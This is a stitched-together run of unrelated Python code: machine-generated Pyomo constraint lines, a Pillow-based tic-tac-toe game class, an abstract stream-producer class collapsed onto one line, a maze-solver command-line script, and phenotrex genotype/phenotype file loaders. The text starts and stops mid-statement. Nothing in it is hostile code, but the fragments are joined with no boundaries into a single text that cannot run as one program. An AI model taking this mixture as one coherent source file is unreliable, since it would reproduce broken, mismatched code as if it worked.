Constraint(expr= - m.b1541 + m.b1542 - m.b1632 <= 0) m.c2785 = Constraint(expr= - m.b1541 - m.b1542 + m.b1543 - m.b1633 <= 0) m.c2786 = Constraint(expr= m.b1544 - m.b1634 <= 0) m.c2787 = Constraint(expr= - m.b1544 + m.b1545 - m.b1635 <= 0) m.c2788 = Constraint(expr= - m.b1544 - m.b1545 + m.b1546 - m.b1636 <= 0) m.c2789 = Constraint(expr= m.b1547 - m.b1637 <= 0) m.c2790 = Constraint(expr= - m.b1547 + m.b1548 - m.b1638 <= 0) m.c2791 = Constraint(expr= - m.b1547 - m.b1548 + m.b1549 - m.b1639 <= 0) m.c2792 = Constraint(expr= m.b1550 - m.b1640 <= 0) m.c2793 = Constraint(expr= - m.b1550 + m.b1551 - m.b1641 <= 0) m.c2794 = Constraint(expr= - m.b1550 - m.b1551 + m.b1552 - m.b1642 <= 0) m.c2795 = Constraint(expr= m.b1553 - m.b1643 <= 0) m.c2796 = Constraint(expr= - m.b1553 + m.b1554 - m.b1644 <= 0) m.c2797 = Constraint(expr= - m.b1553 - m.b1554 + m.b1555 - m.b1645 <= 0) m.c2798 = Constraint(expr= m.b1556 - m.b1646 <= 0) m.c2799 = Constraint(expr= - m.b1556 + m.b1557 - m.b1647 <= 0) m.c2800 = Constraint(expr= - m.b1556 - m.b1557 + m.b1558 - m.b1648 <= 0) m.c2801 = Constraint(expr= m.b1559 - m.b1649 <= 0) m.c2802 = Constraint(expr= - m.b1559 + m.b1560 - m.b1650 <= 0) m.c2803 = Constraint(expr= - m.b1559 - m.b1560 + m.b1561 - m.b1651 <= 0) m.c2804 = Constraint(expr= m.b1562 - m.b1652 <= 0) m.c2805 = Constraint(expr= - m.b1562 + m.b1563 - m.b1653 <= 0) m.c2806 = Constraint(expr= - m.b1562 - m.b1563 + m.b1564 - m.b1654 <= 0) m.c2807 = Constraint(expr= m.b1565 - m.b1655 <= 0) m.c2808 = Constraint(expr= - m.b1565 + m.b1566 - m.b1656 <= 0) m.c2809 = Constraint(expr= - m.b1565 - m.b1566 + m.b1567 - m.b1657 <= 0) m.c2810 = Constraint(expr= m.b1568 - m.b1658 <= 0) m.c2811 = Constraint(expr= - m.b1568 + m.b1569 - m.b1659 <= 0) m.c2812 = Constraint(expr= - m.b1568 - m.b1569 + m.b1570 - m.b1660 <= 0) m.c2813 = Constraint(expr= m.b1571 - m.b1661 <= 0) m.c2814 = Constraint(expr= - m.b1571 + m.b1572 - m.b1662 <= 0) m.c2815 = Constraint(expr= - m.b1571 - m.b1572 + m.b1573 - m.b1663 <= 0) 
# Logical constraints c2816-c2935 (GAMS-generated; binary variable couplings).
# c2816-c2821: ordering/selection implications onto b1664..b1669.
m.c2816 = Constraint(expr=m.b1574 - m.b1664 <= 0)
m.c2817 = Constraint(expr=-m.b1574 + m.b1575 - m.b1665 <= 0)
m.c2818 = Constraint(expr=-m.b1574 - m.b1575 + m.b1576 - m.b1666 <= 0)
m.c2819 = Constraint(expr=m.b1577 - m.b1667 <= 0)
m.c2820 = Constraint(expr=-m.b1577 + m.b1578 - m.b1668 <= 0)
m.c2821 = Constraint(expr=-m.b1577 - m.b1578 + m.b1579 - m.b1669 <= 0)
# c2822-c2824: exactly-one selection pairs.
m.c2822 = Constraint(expr=m.b1490 + m.b1493 == 1)
m.c2823 = Constraint(expr=m.b1491 + m.b1494 == 1)
m.c2824 = Constraint(expr=m.b1492 + m.b1495 == 1)
# c2825-c2851: "if selected then at least one successor" implications.
m.c2825 = Constraint(expr=-m.b1496 + m.b1505 + m.b1508 >= 0)
m.c2826 = Constraint(expr=-m.b1497 + m.b1506 + m.b1509 >= 0)
m.c2827 = Constraint(expr=-m.b1498 + m.b1507 + m.b1510 >= 0)
m.c2828 = Constraint(expr=-m.b1505 + m.b1523 >= 0)
m.c2829 = Constraint(expr=-m.b1506 + m.b1524 >= 0)
m.c2830 = Constraint(expr=-m.b1507 + m.b1525 >= 0)
m.c2831 = Constraint(expr=-m.b1508 + m.b1526 >= 0)
m.c2832 = Constraint(expr=-m.b1509 + m.b1527 >= 0)
m.c2833 = Constraint(expr=-m.b1510 + m.b1528 >= 0)
m.c2834 = Constraint(expr=-m.b1499 + m.b1511 >= 0)
m.c2835 = Constraint(expr=-m.b1500 + m.b1512 >= 0)
m.c2836 = Constraint(expr=-m.b1501 + m.b1513 >= 0)
m.c2837 = Constraint(expr=-m.b1511 + m.b1529 + m.b1532 >= 0)
m.c2838 = Constraint(expr=-m.b1512 + m.b1530 + m.b1533 >= 0)
m.c2839 = Constraint(expr=-m.b1513 + m.b1531 + m.b1534 >= 0)
m.c2840 = Constraint(expr=-m.b1502 + m.b1514 + m.b1517 + m.b1520 >= 0)
m.c2841 = Constraint(expr=-m.b1503 + m.b1515 + m.b1518 + m.b1521 >= 0)
m.c2842 = Constraint(expr=-m.b1504 + m.b1516 + m.b1519 + m.b1522 >= 0)
m.c2843 = Constraint(expr=-m.b1514 + m.b1532 >= 0)
m.c2844 = Constraint(expr=-m.b1515 + m.b1533 >= 0)
m.c2845 = Constraint(expr=-m.b1516 + m.b1534 >= 0)
m.c2846 = Constraint(expr=-m.b1517 + m.b1535 + m.b1538 >= 0)
m.c2847 = Constraint(expr=-m.b1518 + m.b1536 + m.b1539 >= 0)
m.c2848 = Constraint(expr=-m.b1519 + m.b1537 + m.b1540 >= 0)
m.c2849 = Constraint(expr=-m.b1520 + m.b1541 + m.b1544 + m.b1547 >= 0)
m.c2850 = Constraint(expr=-m.b1521 + m.b1542 + m.b1545 + m.b1548 >= 0)
m.c2851 = Constraint(expr=-m.b1522 + m.b1543 + m.b1546 + m.b1549 >= 0)
# c2852-c2905: "successor implies predecessor selected" implications.
m.c2852 = Constraint(expr=m.b1490 + m.b1493 - m.b1496 >= 0)
m.c2853 = Constraint(expr=m.b1491 + m.b1494 - m.b1497 >= 0)
m.c2854 = Constraint(expr=m.b1492 + m.b1495 - m.b1498 >= 0)
m.c2855 = Constraint(expr=m.b1490 + m.b1493 - m.b1499 >= 0)
m.c2856 = Constraint(expr=m.b1491 + m.b1494 - m.b1500 >= 0)
m.c2857 = Constraint(expr=m.b1492 + m.b1495 - m.b1501 >= 0)
m.c2858 = Constraint(expr=m.b1490 + m.b1493 - m.b1502 >= 0)
m.c2859 = Constraint(expr=m.b1491 + m.b1494 - m.b1503 >= 0)
m.c2860 = Constraint(expr=m.b1492 + m.b1495 - m.b1504 >= 0)
m.c2861 = Constraint(expr=m.b1496 - m.b1505 >= 0)
m.c2862 = Constraint(expr=m.b1497 - m.b1506 >= 0)
m.c2863 = Constraint(expr=m.b1498 - m.b1507 >= 0)
m.c2864 = Constraint(expr=m.b1496 - m.b1508 >= 0)
m.c2865 = Constraint(expr=m.b1497 - m.b1509 >= 0)
m.c2866 = Constraint(expr=m.b1498 - m.b1510 >= 0)
m.c2867 = Constraint(expr=m.b1499 - m.b1511 >= 0)
m.c2868 = Constraint(expr=m.b1500 - m.b1512 >= 0)
m.c2869 = Constraint(expr=m.b1501 - m.b1513 >= 0)
m.c2870 = Constraint(expr=m.b1502 - m.b1514 >= 0)
m.c2871 = Constraint(expr=m.b1503 - m.b1515 >= 0)
m.c2872 = Constraint(expr=m.b1504 - m.b1516 >= 0)
m.c2873 = Constraint(expr=m.b1502 - m.b1517 >= 0)
m.c2874 = Constraint(expr=m.b1503 - m.b1518 >= 0)
m.c2875 = Constraint(expr=m.b1504 - m.b1519 >= 0)
m.c2876 = Constraint(expr=m.b1502 - m.b1520 >= 0)
m.c2877 = Constraint(expr=m.b1503 - m.b1521 >= 0)
m.c2878 = Constraint(expr=m.b1504 - m.b1522 >= 0)
m.c2879 = Constraint(expr=m.b1505 - m.b1523 >= 0)
m.c2880 = Constraint(expr=m.b1506 - m.b1524 >= 0)
m.c2881 = Constraint(expr=m.b1507 - m.b1525 >= 0)
m.c2882 = Constraint(expr=m.b1508 - m.b1526 >= 0)
m.c2883 = Constraint(expr=m.b1509 - m.b1527 >= 0)
m.c2884 = Constraint(expr=m.b1510 - m.b1528 >= 0)
m.c2885 = Constraint(expr=m.b1511 - m.b1529 >= 0)
m.c2886 = Constraint(expr=m.b1512 - m.b1530 >= 0)
m.c2887 = Constraint(expr=m.b1513 - m.b1531 >= 0)
m.c2888 = Constraint(expr=m.b1511 - m.b1532 >= 0)
m.c2889 = Constraint(expr=m.b1512 - m.b1533 >= 0)
m.c2890 = Constraint(expr=m.b1513 - m.b1534 >= 0)
m.c2891 = Constraint(expr=m.b1517 - m.b1535 >= 0)
m.c2892 = Constraint(expr=m.b1518 - m.b1536 >= 0)
m.c2893 = Constraint(expr=m.b1519 - m.b1537 >= 0)
m.c2894 = Constraint(expr=m.b1517 - m.b1538 >= 0)
m.c2895 = Constraint(expr=m.b1518 - m.b1539 >= 0)
m.c2896 = Constraint(expr=m.b1519 - m.b1540 >= 0)
m.c2897 = Constraint(expr=m.b1520 - m.b1541 >= 0)
m.c2898 = Constraint(expr=m.b1521 - m.b1542 >= 0)
m.c2899 = Constraint(expr=m.b1522 - m.b1543 >= 0)
m.c2900 = Constraint(expr=m.b1520 - m.b1544 >= 0)
m.c2901 = Constraint(expr=m.b1521 - m.b1545 >= 0)
m.c2902 = Constraint(expr=m.b1522 - m.b1546 >= 0)
m.c2903 = Constraint(expr=m.b1520 - m.b1547 >= 0)
m.c2904 = Constraint(expr=m.b1521 - m.b1548 >= 0)
m.c2905 = Constraint(expr=m.b1522 - m.b1549 >= 0)
# c2906-c2914: further successor implications.
m.c2906 = Constraint(expr=-m.b1547 + m.b1550 + m.b1553 >= 0)
m.c2907 = Constraint(expr=-m.b1548 + m.b1551 + m.b1554 >= 0)
m.c2908 = Constraint(expr=-m.b1549 + m.b1552 + m.b1555 >= 0)
m.c2909 = Constraint(expr=-m.b1556 + m.b1565 + m.b1568 >= 0)
m.c2910 = Constraint(expr=-m.b1557 + m.b1566 + m.b1569 >= 0)
m.c2911 = Constraint(expr=-m.b1558 + m.b1567 + m.b1570 >= 0)
m.c2912 = Constraint(expr=-m.b1559 + m.b1571 >= 0)
m.c2913 = Constraint(expr=-m.b1560 + m.b1572 >= 0)
m.c2914 = Constraint(expr=-m.b1561 + m.b1573 >= 0)
# c2915-c2935: predecessor implications.
m.c2915 = Constraint(expr=m.b1547 - m.b1550 >= 0)
m.c2916 = Constraint(expr=m.b1548 - m.b1551 >= 0)
m.c2917 = Constraint(expr=m.b1549 - m.b1552 >= 0)
m.c2918 = Constraint(expr=m.b1547 - m.b1553 >= 0)
m.c2919 = Constraint(expr=m.b1548 - m.b1554 >= 0)
m.c2920 = Constraint(expr=m.b1549 - m.b1555 >= 0)
m.c2921 = Constraint(expr=m.b1556 - m.b1565 >= 0)
m.c2922 = Constraint(expr=m.b1557 - m.b1566 >= 0)
m.c2923 = Constraint(expr=m.b1558 - m.b1567 >= 0)
m.c2924 = Constraint(expr=m.b1556 - m.b1568 >= 0)
m.c2925 = Constraint(expr=m.b1557 - m.b1569 >= 0)
m.c2926 = Constraint(expr=m.b1558 - m.b1570 >= 0)
m.c2927 = Constraint(expr=m.b1559 - m.b1571 >= 0)
m.c2928 = Constraint(expr=m.b1560 - m.b1572 >= 0)
m.c2929 = Constraint(expr=m.b1561 - m.b1573 >= 0)
m.c2930 = Constraint(expr=m.b1562 - m.b1574 >= 0)
m.c2931 = Constraint(expr=m.b1563 - m.b1575 >= 0)
m.c2932 = Constraint(expr=m.b1564 - m.b1576 >= 0)
m.c2933 = Constraint(expr=m.b1562 - m.b1577 >= 0)
m.c2934 = Constraint(expr=m.b1563 - m.b1578 >= 0)
m.c2935 = Constraint(expr=m.b1564 - m.b1579 >= 0)
# NOTE: `import PIL` alone does not load the `PIL.Image` submodule;
# Pillow requires importing it explicitly.
from PIL import Image
import random
import os
import shutil


class Winner(Exception):
    """Raised by TicTacToe.move when the mark just placed wins the game."""


class Tie(Exception):
    """Raised by TicTacToe.move when the board fills up with no winner."""


class InvalidMove(Exception):
    """Raised by TicTacToe.move when the field is out of range or taken."""


class TicTacToe:
    """Image-backed tic-tac-toe game between two players.

    The board is rendered onto a per-guild PNG copied into the cache
    directory; moves paste mark images onto it.
    """

    def __init__(self, player1, player2):
        # Copy the empty grid into the cache directory, then open the
        # copy so moves can be drawn onto it in place.
        self.file = f"cache/ttt_{player1.guild.id}.png"
        shutil.copy("assets/tictactoe/grid.png", self.file)
        self.image = Image.open(self.file)
        # Randomly choose who gets which mark and which mark starts.
        self.turn = random.choice(["x", "o"])
        if bool(random.getrandbits(1)):
            self.players = {"x": player1, "o": player2}
        else:
            self.players = {"o": player1, "x": player2}
        # Board state: nine fields, "" = free, otherwise "x" or "o".
        self.fields = ["", "", "", "", "", "", "", "", ""]

    def __del__(self):
        # Close the image, then remove the cached board file.
        self.image.close()
        try:
            os.remove(self.file)
        except PermissionError:
            print(f"Nem lehetett eltávolítani a {self.file}.")

    def is_board_full(self):
        """Return True when no field is free."""
        return "" not in self.fields

    def is_field_free(self, field):
        """Return True when *field* (0-8) is unoccupied."""
        return self.fields[field] == ""

    def move(self, field):
        """Place the current player's mark on *field* (0-8) and advance the turn.

        Raises Winner when the move wins, Tie when it fills the board,
        and InvalidMove when the field is out of range or occupied.
        """
        if (0 <= field <= 8) and self.is_field_free(field):
            self.fields[field] = self.turn
            # Check whether this move ended the game.
            f, p = self.is_winner(self.fields, self.turn)
            # Pixel offset of each field on the grid image.
            poses = {
                0: (24, 24), 1: (114, 24), 2: (204, 24),
                3: (24, 114), 4: (114, 114), 5: (204, 114),
                6: (24, 204), 7: (114, 204), 8: (204, 204),
            }
            # Paste the mark image onto the board.
            with Image.open(f"assets/tictactoe/{self.turn}.png") as li:
                self.image.paste(li, poses[field])
            # If the move won, overlay the winning line.
            if f is not False:
                with Image.open(f"assets/tictactoe/{f}.png") as c:
                    if f in ("v", "h"):
                        self.image.paste(c, p)
                    else:
                        # Diagonal overlays are pasted with themselves as
                        # mask, presumably to keep their transparency.
                        self.image.paste(c, p, c)
            # Persist the board and hand the turn to the other player.
            self.image.save(self.file)
            self.turn = "x" if self.turn == "o" else "o"
            if f is not False:
                raise Winner
            elif self.is_board_full():
                raise Tie
        else:
            raise InvalidMove

    def get_board_copy(self):
        """Return a shallow copy of the board state."""
        return list(self.fields)

    def get_move_from_list(self, moves):
        """Return a random free field among *moves*, or None if none is free."""
        free = [i for i in moves if self.is_field_free(i)]
        return random.choice(free) if free else None

    def get_computer_move(self, stoopid_mode=True):
        """Pick the computer's next field.

        With stoopid_mode the move is uniformly random; otherwise a simple
        win / block / corner / center / edge heuristic is used.
        """
        if stoopid_mode:
            return random.choice([f for f in range(9) if self.is_field_free(f)])
        # Determine the bot's mark and the human player's mark.
        bl, pl = ("x", "o") if self.players["x"].bot else ("o", "x")
        for field in range(9):
            board = self.get_board_copy()
            if board[field] == "":
                # Take an immediate win on this field if available...
                board[field] = bl
                i, p = self.is_winner(board, bl)
                if i is not False:
                    return field
                # ...otherwise block the player's win on this field.
                board[field] = pl
                i, p = self.is_winner(board, pl)
                if i is not False:
                    return field
        # Prefer a corner...
        field = self.get_move_from_list([0, 2, 6, 8])
        if field is not None:
            return field
        # ...then the center...
        if self.is_field_free(4):
            return 4
        # ...and fall back to an edge.
        return self.get_move_from_list([1, 3, 5, 7])

    def is_winner(self, f, l):
        """Return (line, pos) if mark *l* has three in a row on board *f*.

        line is "h"/"v" for straight lines (pos is the paste offset) or
        "l"/"r" for the diagonals; returns (False, False) if no win.
        """
        if f[0] == l and f[1] == l and f[2] == l:
            return "h", (20, 57)
        elif f[3] == l and f[4] == l and f[5] == l:
            return "h", (20, 147)
        elif f[6] == l and f[7] == l and f[8] == l:
            return "h", (20, 237)
        elif f[0] == l and f[3] == l and f[6] == l:
            return "v", (57, 20)
        elif f[1] == l and f[4] == l and f[7] == l:
            return "v", (147, 20)
        elif f[2] == l and f[5] == l and f[8] == l:
            return "v", (237, 20)
        elif f[0] == l and f[4] == l and f[8] == l:
            return "l", (0, 0)
        elif f[2] == l and f[4] == l and f[6] == l:
            return "r", (0, 0)
        else:
            return False, False
"""Provide definition of abstract Stream Producer This file can be imported as a module and contains the following classes: * StreamProducer - Abstract class that must be implement by concrete Stream Producers """ import abc import logging import types import typing class StreamProducer(abc.ABC): """Abstract class that must be implement by concrete Stream Producers""" def __init__(self, **kwargs): """Initializes the logger to be used Parameters ---------- kwargs : dict logger_name : str Logger's name. """ logger_name = kwargs.get("logger_name", __name__) self._logger = logging.getLogger(logger_name) self._logger.debug("StreamProducer.__init__(logger_name=%s)", logger_name) def __enter__(self): self._logger.debug("StreamProducer.__enter__()") self.connect() def __exit__( self, exc_type: typing.Optional[typing.Type[BaseException]], exc_val: typing.Optional[BaseException], exc_tb: typing.Optional[types.TracebackType], ): self._logger.debug("StreamProducer.__exit__()") self.disconnect() @abc.abstractmethod def connect(self): """Establish the required connections with the Stream Server.""" @abc.abstractmethod def disconnect(self): """Closes all connections with the Stream Server""" @abc.abstractmethod def persist_data(self, data: typing.Dict[str, typing.Union[str, int]]): """Persist a dict with the website metrics in the corresponding Stream Server. data : typing.Dict[str, typing.Union[str, int]] Website metrics """
# coding: utf-8
"""Solve every maze image found in ./output, writing solution and depth maps."""
import sys
import os
import re
import argparse

from lib import meiro


# by https://stackoverflow.com/questions/15008758/parsing-boolean-values-with-argparse
def str2bool(v):
    """Parse a human-friendly boolean string; raise for anything else."""
    if v.lower() in ('yes', 'true', 't', 'y', '1'):
        return True
    elif v.lower() in ('no', 'false', 'f', 'n', '0'):
        return False
    else:
        raise argparse.ArgumentTypeError('Boolean value expected.')


parser = argparse.ArgumentParser(description="-c/-colortype [0-2] : gradation color type, -d/-drawanswer [True|False] : whether draw answer line; arguments are optional")
parser.add_argument("-c", type=int, help="-c/-colortype [0-2] : gradation color type [0-3]", required=False)
parser.add_argument("-colortype", type=int, help="-c/-colortype [0-2] : gradation color type [0-3]", required=False)
parser.add_argument("-d", type=str2bool, help="-d/-drawanswer [True|False] : whether draw answer line [True|False]", required=False)
parser.add_argument("-drawanswer", type=str2bool, help="-d/-drawanswer [True|False] : whether draw answer line [True|False]", required=False)
command_arguments = parser.parse_args()

colortype = 0
draw = True
# Compare against None, not truthiness: 0 is a valid colortype (and False a
# valid draw flag) but both are falsy, which previously made `-c 0` ignored.
if command_arguments.c is not None:
    colortype = command_arguments.c
if command_arguments.colortype is not None:
    colortype = command_arguments.colortype
if command_arguments.d is not None:
    draw = command_arguments.d
if command_arguments.drawanswer is not None:
    draw = command_arguments.drawanswer

# The solver recurses per maze cell, so a deep recursion limit is needed.
sys.setrecursionlimit(100000)

directory = os.path.dirname('output/')
if not os.path.exists(directory):
    print('[error] there isn\'t "output" directory')
    sys.exit(1)  # error path: exit non-zero (quit() exited with code 0)
directory2 = os.path.dirname('output/solution/')
if not os.path.exists(directory2):
    os.makedirs(directory2)

files = os.listdir(directory)
c = 0  # number of maps generated this run
for f in files:
    m = re.match(r'meiro_(.+)', f)
    if m:
        solutionpath = directory2 + '/solutionmap_' + m.group(1)
        depthpath = directory2 + '/depthmap_' + m.group(1)
        # Only load/solve the maze when at least one output is missing.
        if (not os.path.exists(solutionpath)) or (not os.path.exists(depthpath)):
            solve1 = meiro.SolveMeiro(os.path.abspath(directory + '/' + f))
            if not os.path.exists(solutionpath):
                solve1.createSolutionMap(os.path.abspath(solutionpath))
                c += 1
            if not os.path.exists(depthpath):
                solve1.createDepthMap(os.path.abspath(depthpath), colortype, draw)
                c += 1
if c == 0:
    print('[info] No solution map or depth map is generated.')
#
# Created by Lukas Lüftinger on 2/5/19.
#
"""I/O helpers for loading and writing phenotrex data files."""
from typing import List, Dict, Tuple, Optional
from collections import Counter
import json
import gzip

import pandas as pd
from Bio import SeqIO
# NOTE(review): Bio.Alphabet was removed in Biopython 1.78; this module
# requires an older Biopython release — confirm the pinned version.
from Bio.Alphabet import IUPAC, HasStopCodon, _verify_alphabet
import numpy as np

from phenotrex.util.logging import get_logger
from phenotrex.structure.records import GenotypeRecord, PhenotypeRecord, GroupRecord, TrainingRecord

# Mapping from trait sign labels (as found in phenotype files) to class labels.
DEFAULT_TRAIT_SIGN_MAPPING = {"YES": 1, "NO": 0}


def _is_gzipped(f: str) -> bool:
    """Return True if the file at path ``f`` is gzip-compressed."""
    try:
        with gzip.open(f) as handle:
            handle.read(1)
        return True
    except OSError:
        return False


def load_fasta_file(input_file: str) -> Tuple[str, List]:
    """
    Load a fasta file into a list of SeqRecords.

    :param input_file: The path to the input fasta file (may be gzipped).
    :returns: A tuple of the sequence type ('protein' or 'dna'),
              and the list of SeqRecords.
    :raises ValueError: If the records are neither valid DNA nor protein.
    """
    if _is_gzipped(input_file):
        openfunc = gzip.open
        bit = 'rt'
    else:
        openfunc = open
        bit = 'r'
    with openfunc(input_file, bit) as handle:
        # First try parsing as ambiguous DNA...
        seqs = [x.upper() for x in SeqIO.parse(handle=handle, format='fasta',
                                               alphabet=IUPAC.ambiguous_dna)]
        if not all(_verify_alphabet(x.seq) for x in seqs):
            # ...then fall back to protein if any sequence fails verification.
            handle.seek(0)
            seqs = [x.upper() for x in SeqIO.parse(handle=handle, format='fasta',
                                                   alphabet=HasStopCodon(IUPAC.extended_protein))]
            if not all(_verify_alphabet(x.seq) for x in seqs):
                raise ValueError('Invalid input file (neither DNA nor protein FASTA).')
            return 'protein', seqs
        return 'dna', seqs


def load_genotype_file(input_file: str) -> List[GenotypeRecord]:
    """
    Loads a genotype .tsv file and returns a list of GenotypeRecord for each entry.

    Leading '#key:value' lines are parsed as metadata; if no 'feature_type'
    entry is present, the file is treated as 'legacy'.

    :param input_file: The path to the input genotype file.
    :return: List[GenotypeRecord] of records in the genotype file,
             sorted by identifier.
    :raises RuntimeError: If duplicate identifiers are found.
    """
    with open(input_file) as genotype_file:
        metadata = dict()
        genotype_lines = []
        genotype_records = []
        for line in genotype_file:
            if line.strip().startswith('#'):
                k, v = line[1:].strip().split(':', maxsplit=1)
                metadata[k] = v
            else:
                genotype_lines.append(line)
        # Explicit metadata overrides the 'legacy' default.
        metadata = {**{'feature_type': 'legacy'}, **metadata}
        for line in genotype_lines:
            identifier, *features = line.strip().split("\t")
            genotype_records.append(
                GenotypeRecord(
                    identifier=identifier,
                    feature_type=metadata['feature_type'],
                    features=features
                ))
    dupcount = Counter([x.identifier for x in genotype_records])
    if dupcount.most_common()[0][1] > 1:
        raise RuntimeError(f"Duplicate entries found in genotype file: {dupcount}")
    return sorted(genotype_records, key=lambda x: x.identifier)


def load_phenotype_file(
    input_file: str,
    sign_mapping: Dict[str, int] = None
) -> List[PhenotypeRecord]:
    """
    Loads a phenotype .tsv file and returns a list of PhenotypeRecord for each entry.

    :param input_file: The path to the input phenotype file.
    :param sign_mapping: an optional Dict to change mappings of trait sign.
                         Default: {"YES": 1, "NO": 0}
    :return: List[PhenotypeRecord] of records in the phenotype file,
             sorted by identifier.
    :raises RuntimeError: If duplicate identifiers are found.
    """
    with open(input_file) as phenotype_file:
        identifiers = []
        trait_signs = []
        _, trait_name = phenotype_file.readline().strip().split("\t")
        for line in phenotype_file:
            identifier, trait_sign = line.strip().split("\t")
            identifiers.append(identifier)
            trait_signs.append(trait_sign)
    dupcount = Counter(identifiers)
    if dupcount.most_common()[0][1] > 1:
        # Fixed: this message previously (incorrectly) said 'genotype file'.
        raise RuntimeError(f"Duplicate entries found in phenotype file: {dupcount}")
    if sign_mapping is None:
        sign_mapping = DEFAULT_TRAIT_SIGN_MAPPING
    # Labels not in the mapping become None (missing/unusable trait sign).
    trait_signs = [sign_mapping.get(x, None) for x in trait_signs]
    phenotype_records = [PhenotypeRecord(identifier=x, trait_name=trait_name, trait_sign=y)
                         for x, y in zip(identifiers, trait_signs)]
    return sorted(phenotype_records, key=lambda x: x.identifier)


def load_groups_file(input_file: str, selected_rank: str = None) -> List[GroupRecord]:
    """
    Loads a .tsv file which contains group or taxid for each sample in the
    other training files.

    Group-Ids may be ncbi-taxon-ids or arbitrary group names. Taxon-Ids are
    only used if a standard rank is selected, otherwise user-specified
    group-ids are assumed.

    :param input_file: path to the file that is processed
    :param selected_rank: the standard rank that is selected (optional); if
                          not set, the input file is assumed to contain
                          groups, i.e., each unique entry of the ID will be
                          a new group
    :return: a list of GroupRecords, sorted by identifier
    :raises RuntimeError: If duplicate identifiers are found, or taxonomic
                          grouping is requested without ete3 installed.
    """
    with open(input_file) as groups_file:
        identifiers = []
        group_ids = []
        for line in groups_file:
            identifier, group_id = line.strip().split("\t")
            identifiers.append(identifier)
            group_ids.append(group_id)
    dupcount = Counter(identifiers)
    if dupcount.most_common()[0][1] > 1:
        raise RuntimeError(f"Duplicate entries found in groups file: {dupcount}")
    if selected_rank:
        try:
            # Imported lazily: ete3 (pulled in by the taxonomy helper) is an
            # optional dependency.
            from phenotrex.util.taxonomy import get_taxonomic_group_mapping
            group_name_mapping, group_id_mapping = get_taxonomic_group_mapping(
                group_ids=group_ids, selected_rank=selected_rank
            )
            group_records = [GroupRecord(identifier=x, group_id=group_id_mapping[y],
                                         group_name=group_name_mapping[y])
                             for x, y in zip(identifiers, group_ids)]
        except ImportError:
            raise RuntimeError(
                "A required package was not found. ete3 is required to support taxonomic ids for"
                " grouping. Please install or divide your samples into groups manually")
    else:
        # Without a rank, each unique id in the file forms its own group.
        group_id_mapping = {x: group_id for group_id, x in enumerate(set(group_ids))}
        group_records = [GroupRecord(identifier=x, group_id=group_id_mapping[y], group_name=y)
                         for x, y in zip(identifiers, group_ids)]
    return sorted(group_records, key=lambda x: x.identifier)


def load_params_file(params_file: str) -> Dict:
    """
    Load a JSON file of training parameters.

    :param params_file: The input file.
    :return: A dictionary of training parameters.
    """
    with open(params_file, 'r') as fin:
        return json.load(fin)


def write_genotype_file(genotypes: List[GenotypeRecord], output_file: str):
    """
    Saves a list of GenotypeRecords to a .genotype file.

    :param genotypes: The genotypes to write to a file.
    :param output_file: The output file path.
    :raises ValueError: If the records have differing feature_types.
    """
    feature_types = list(set(x.feature_type for x in genotypes))
    if len(feature_types) > 1:
        raise ValueError(
            'Cannot write GenotypeRecords with different feature_types to the same genotype file.'
        )
    with open(output_file, 'w') as genotype_file:
        genotype_file.write(f'#feature_type:{feature_types[0]}\n')
        for g in genotypes:
            # Fixed: '\n' was previously part of the tab-join, producing a
            # spurious trailing tab before the newline on every line.
            genotype_file.write('\t'.join([g.identifier, *g.features]) + '\n')


def write_params_file(params_file: str, params: Dict):
    """
    Write a JSON file of training parameters.

    :param params_file: The output file path.
    :param params: A dictionary of training parameters.
    """
    class NumpyEncoder(json.JSONEncoder):
        """JSON encoder that unwraps numpy scalars and arrays."""
        def default(self, obj):
            if isinstance(obj, np.integer):
                return int(obj)
            elif isinstance(obj, np.floating):
                return float(obj)
            elif isinstance(obj, np.ndarray):
                return obj.tolist()
            else:
                return super(NumpyEncoder, self).default(obj)

    with open(params_file, 'w') as fout:
        json.dump(params, fp=fout, indent=2, cls=NumpyEncoder)
        fout.write('\n')


def collate_training_data(
    genotype_records: List[GenotypeRecord],
    phenotype_records: List[PhenotypeRecord],
    group_records: List[GroupRecord],
    verb: bool = False
) -> List[TrainingRecord]:
    """
    Returns a list of TrainingRecord from two lists of GenotypeRecord and
    PhenotypeRecord. To be used for training and CV of TrexClassifier.
    Checks if 1:1 mapping of phenotypes and genotypes exists,
    and if all PhenotypeRecords pertain to same trait.

    :param genotype_records: List[GenotypeRecord]
    :param phenotype_records: List[PhenotypeRecord]
    :param group_records: List[GroupRecord] optional, if leave one group out
                          is the split strategy
    :param verb: toggle verbosity.
    :return: A list of TrainingRecords.
    :raises RuntimeError: On missing identifiers or multiple traits.
    """
    logger = get_logger(__name__, verb=verb)
    gr_dict = {x.identifier: x for x in genotype_records}
    pr_dict = {x.identifier: x for x in phenotype_records}
    gp_dict = {x.identifier: x for x in group_records}
    traits = set(x.trait_name for x in phenotype_records)
    if not set(gr_dict.keys()).issuperset(set(pr_dict.keys())):
        # Fixed: this compares against genotype records, so the message
        # must name the genotype file (it previously said 'phenotype file').
        raise RuntimeError(
            "Not all identifiers of phenotype records were found in the genotype file. "
            "Cannot collate to TrainingRecords."
        )
    if not set(gp_dict.keys()).issuperset(set(pr_dict.keys())):
        raise RuntimeError(
            "Not all identifiers of phenotype records were found in the groups file. "
            "Cannot collate to TrainingRecords."
        )
    if len(traits) > 1:
        raise RuntimeError(
            "More than one trait has been found in phenotype records. "
            "Cannot collate to TrainingRecords."
        )
    ret = [
        TrainingRecord(
            identifier=pr_dict[x].identifier,
            trait_name=pr_dict[x].trait_name,
            trait_sign=pr_dict[x].trait_sign,
            feature_type=gr_dict[x].feature_type,
            features=gr_dict[x].features,
            group_name=gp_dict[x].group_name,
            group_id=gp_dict[x].group_id
        ) for x in pr_dict.keys()
    ]
    logger.info(f"Collated genotype and phenotype records into {len(ret)} TrainingRecord.")
    return ret


def load_training_files(
    genotype_file: str,
    phenotype_file: str,
    groups_file: str = None,
    selected_rank: str = None,
    verb=False
) -> Tuple[
    List[TrainingRecord], List[GenotypeRecord], List[PhenotypeRecord], List[GroupRecord]
]:
    """
    Convenience function to load phenotype, genotype and optionally groups
    file together, and return a list of TrainingRecord.

    :param genotype_file: The path to the input genotype file.
    :param phenotype_file: The path to the input phenotype file.
    :param groups_file: The path to the input groups file. Optional.
    :param selected_rank: The selected standard rank to use for taxonomic grouping
    :param verb: toggle verbosity.
    :return: The collated TrainingRecords as well as single genotype,
             phenotype and group records
    """
    logger = get_logger(__name__, verb=verb)
    gr = load_genotype_file(genotype_file)
    pr = load_phenotype_file(phenotype_file)
    if groups_file:
        gp = load_groups_file(groups_file, selected_rank=selected_rank)
    else:
        # if not given, each sample gets its own group (not used currently)
        gp = [
